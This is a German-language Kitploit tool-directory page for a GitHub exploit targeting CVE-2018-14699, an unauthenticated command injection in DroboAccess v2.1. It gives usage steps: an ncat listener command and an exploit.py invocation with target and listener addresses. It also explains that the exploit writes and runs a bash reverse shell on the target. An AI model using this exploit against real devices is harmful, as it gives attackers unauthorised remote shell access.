Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-14699 — Nicht authentifizierte blinde Befehlseinschleusung in der enable_user-Funktion von DroboAccess v 2.1 | Kitploit
Tools/GitHubGitHub/revocain/cve-2018-14699
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubrevocain/cve-2018-14699

CVE-2018-14699

Nicht authentifizierte blinde Befehlseinschleusung in der enable_user-Funktion von DroboAccess v 2.1

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-14699

Unauthentifizierte Command Injection in der enable_user-Funktion von DroboAccess v2.1


Verwendung:

  • Starten Sie zuerst einen Listener (ncat -nvlp 1337)

  • Führen Sie dann den Exploit aus

    • Beispiel: exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='Host für die Ausnutzung, z.B. 192.168.1.122:8080',required=True

    '-l', '--listener-ip', help='Listener-IP', required=True

    '-p', '--port', help='Portnummer des Listeners', required=True

Beschreibung:

CVE-2018-14699 ist eine blinde Command Injection-Schwachstelle in DroboAccess v2.1. Das Problem liegt darin, dass die enable_user-Funktion die Benutzername-Parameter als Benutzereingabe entgegennimmt und dann eine Abhängigkeit aufruft, die direkt eine Shell ausführt, ohne jegliche Bereinigung. Ich stelle dies klar, da es scheinbar keine andere Referenz dazu gibt. Also nochmals: Dies ist keine Schwachstelle im Drobo 5N2, sondern eine Schwachstelle in DroboAccess. Dies wurde erfolgreich auf einem B810n getestet.

Details

Das Skript wird versuchen, ein Skript in eine Datei namens revshell im aktuellen Arbeitsverzeichnis zu schreiben (echo). Wenn dies erfolgreich ist, wird es versuchen, es mit bash als ausführbare Datei aufzurufen, wodurch eine Verbindung zu Ihrem Listener mit bash hergestellt wird!

Ressourcen:

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
Tool herunterladen